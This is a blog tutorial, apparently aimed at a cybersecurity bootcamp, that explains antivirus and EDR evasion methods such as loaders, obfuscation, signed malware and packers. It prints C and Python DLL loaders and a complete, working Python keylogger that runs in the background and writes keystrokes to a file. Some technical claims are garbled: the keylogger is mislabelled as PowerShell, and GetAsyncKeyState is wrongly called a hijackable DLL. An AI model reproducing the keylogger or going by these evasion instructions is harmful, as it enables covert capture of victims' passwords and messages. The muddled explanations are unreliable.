Netizen Watch blog subscriber come from different backgrounds. Some of you are beginners in the Cybersecurity world looking to learn how to keep yourself safe. While others maybe previous students from cybersecurity courses that I’ve taught. A cybersecurity bootcamp asked for a walkthrough of AV Evasion and EDR Bypass techniques. This gives those of you that are not deep in the cybersecurity industry to learn a little more about ethical hacking tactics.

So inexperienced and experienced alike lets talk about how to get malware pass the AV. You may not understand all of it but take what’s for you. 🙏🏾Don’t Skip out on me!🙏🏾

What Is Malware?

Malware is to our machines what infections are to our body. What really makes this analogy work the root what both things are and do. An infection, sickness or disease for humans results in our bodies following instructions for recovery that lead to negative effects in our bodies called symptoms. Those symptoms in computers result in error messages, application crashes, and slow computing speeds. When we go to the doctor they run test on our bodies and those test find signatures or patterns to identify the exact sickness. That test for machines is called an Anti Virus Scan instead of a CAT SCAN or MRI.

Two Methods Of Evasion

All AV and EDR techniques do one of two things or both things:

1. Reduce the symptoms of the malware that can be detected via performance monitoring. An athlete with a lung infection who doesn’t see a dip in their athletic performance won’t go to the doctor.

2. Make the actual malicious code that makes up the malware harder to recognize or something that we haven’t seen before. Think of an unnoticed pregnancy or undetected cancer.

In order to achieve these objectives hackers use several techniques:

Loaders - are used to bypass security tools and load the malware directly into memory. Loaders focus on uploading malicious DLLs (Dynamic Link Libraries) which provide basic functionality to windows systems.
Below is an example of an DLL Loader in C:

#include <windows.h>
#include <stdio.h>

typedef int (*ExampleFunction)(); // Function prototype for the DLL function

int main() {
    // Path to the DLL
    LPCSTR dllPath = "example.dll";  // Change to your DLL path

    // Load the DLL
    HMODULE hDll = LoadLibraryA(dllPath);
    if (hDll == NULL) {
        printf("Failed to load DLL. Error: %lu\n", GetLastError());
        return 1;
    }
    printf("Successfully loaded %s\n", dllPath);

    // Get function address
    ExampleFunction func = (ExampleFunction)GetProcAddress(hDll, "example_function"); // Change to actual function name
    if (!func) {
        printf("Failed to get function address. Error: %lu\n", GetLastError());
        FreeLibrary(hDll);
        return 1;
    }
    printf("Function address found!\n");

    // Execute function
    int result = func();
    printf("Function returned: %d\n", result);

    // Clean up
    FreeLibrary(hDll);
    printf("DLL unloaded.\n");

    return 0;
}

Here is a python script example of a loader:

import ctypes

# Path to the DLL
dll_path = "example.dll"  # Change to your DLL file path

# Load the DLL
try:
    my_dll = ctypes.CDLL(dll_path)
    print(f"Successfully loaded {dll_path}")
except OSError as e:
    print(f"Failed to load DLL: {e}")
    exit()

# Access a function from the DLL
try:
    function_name = "example_function"  # Replace with an actual function name from your DLL
    my_function = my_dll[function_name]
    my_function.argtypes = []  # Define argument types if necessary
    my_function.restype = ctypes.c_int  # Define the return type if necessary

    # Call the function
    result = my_function()
    print(f"Function returned: {result}")
except AttributeError as e:
    print(f"Failed to find function: {e}")

Hijacking and LOTL- DLLs can also be hijacked allowing you to bypass evasion by using tools already installed. DLL Hijacking would be an example of AV Evasion Through the reduction of symptoms. No new uploads; only Admin Access required. For example you can hijack the GetAsyncKeyState DLL in order to make keyloggers. Below is an example of a powershell script that does exactly that:

import ctypes
import time
import threading
import os

# Define a function to check the state of a keyboard key
def check_key(key):
    """Check if a specific key is pressed."""
    state = ctypes.windll.user32.GetAsyncKeyState(key)
    return state == -32767

# Function to log keystrokes in the background
def keylogger():
    file_path = "readthis.txt"
    
    with open(file_path, "a", encoding="utf-8") as logfile:
        while True:
            try:
                # Check each key from 1 to 256
                for key in range(1, 256):
                    if check_key(key):
                        # Write keypress to file
                        logfile.write(chr(key))
                        logfile.flush()  # Ensures immediate saving

                # Sleep to reduce CPU usage
                time.sleep(0.01)
            except Exception as e:
                with open("error.log", "a") as errfile:
                    errfile.write(f"Error: {e}\n")

# Run in the background using a thread
if __name__ == "__main__":
    t = threading.Thread(target=keylogger, daemon=True)
    t.start()

    # Keep the script running in the background
    while True:
        time.sleep(1) 

The idea of hijacking, living off the land(LOTL), or fileless malware into evade AV through the symptoms reduction route. If you are using what is already on the system you don’t have to worry about downloads. LOTL techniques require scripting language knowledge to maximize he effectiveness of your attack. The industry has taken notice of this and added Ruby, Python, Powershell, and Bash to several industry certifications. If you want to learn more LOTL tactics checkout:

Command Line Kung Fu

Obfuscation - one of the easier techniques to implement requires encoding the malware so that it does not trigger detection. The reason we call obfuscation one of the easier techniques is because popular penetration testing(pen test) frameworks (widely availabile hacking software) like Metasploit. One of the Modules in Metasploit is called MSFencode. MSFencode confuses the antivirus software by making the code look completely different. For decades our antivirus software were only signature based meaning they use digital wanted posters for malware. Since obfuscation only puts your malware in a costume it may only be one part of a good strategy. Most modern antivirus software use behavioral detection (sometimes called realtime monitoring) and obfuscation doesn’t change behavior.

Signed Malware - Hackers also use stolen developer certificates (dev certs are like an authenticity sticker for software) to sign their malware. This gives birth to signed malware. Now you may thinking; how this be used ethically? For more advanced contracted pen tests where the client is a software manufacturer this sort of test can provide valuable data regarding a genuine threat they could face. Signed Malware Pen Test would require either the organization trusting a cert generated by the pen testers for the duration of the exercise. Another strategy would be to have the software signed by the client’s dev team. Both would require coordination and well defined controls to ensure the safety of the infrastructure post exploitation. When malicious hackers use these techniques no such controls are in place to protect consumers from the fall out. Microsoft signed malware was found to be active as recent as March 2025, encrypting entire machines and requesting a reward (ransomware). Signed malware pen test could proactively help organizations prepare for these threats.

Packers - packers take the malware and forces it into spanx (body shaping under garment turns a pear into an hour glass and ice cream coned shaped dad bods into me😂). This process is called compression. Only when the program is executed will it return the code to it’s original shape.

User Executed Malware - This technique is more about how you design you malware to be triggered. If it is triggered by the user then the malware may be able to avoid detection and run without suspicion.

Polymorphic Malware - This technique forces malware to change its code after runs to avoid detection. It’s as if the malware is moving operations to a different hideout before the anti-virus come to look. This isn’t normal behavior for software so it does fall prey to more modern techniques.

Conclusion

Understanding AV evasion and EDR bypass techniques is crucial for both cybersecurity professionals and those looking to protect themselves from threats. Whether you're a beginner learning how malware works or an advanced security expert refining your skills, these techniques give insight into the cat-and-mouse game between attackers and defenders.

While hackers exploit these strategies for malicious purposes, ethical hackers and penetration testers use them to strengthen security, helping organizations identify weaknesses before real attackers do. The evolution of cybersecurity means modern defenses go beyond simple signature-based detection, incorporating behavioral analysis, AI-driven threat intelligence, and proactive monitoring.

If you're new to these concepts, take this as an opportunity to deepen your understanding of cybersecurity. If you're experienced, use this knowledge to improve your defensive strategies. Remember, the goal is not just to bypass security—but to build better security. Stay curious, stay ethical, and stay vigilant.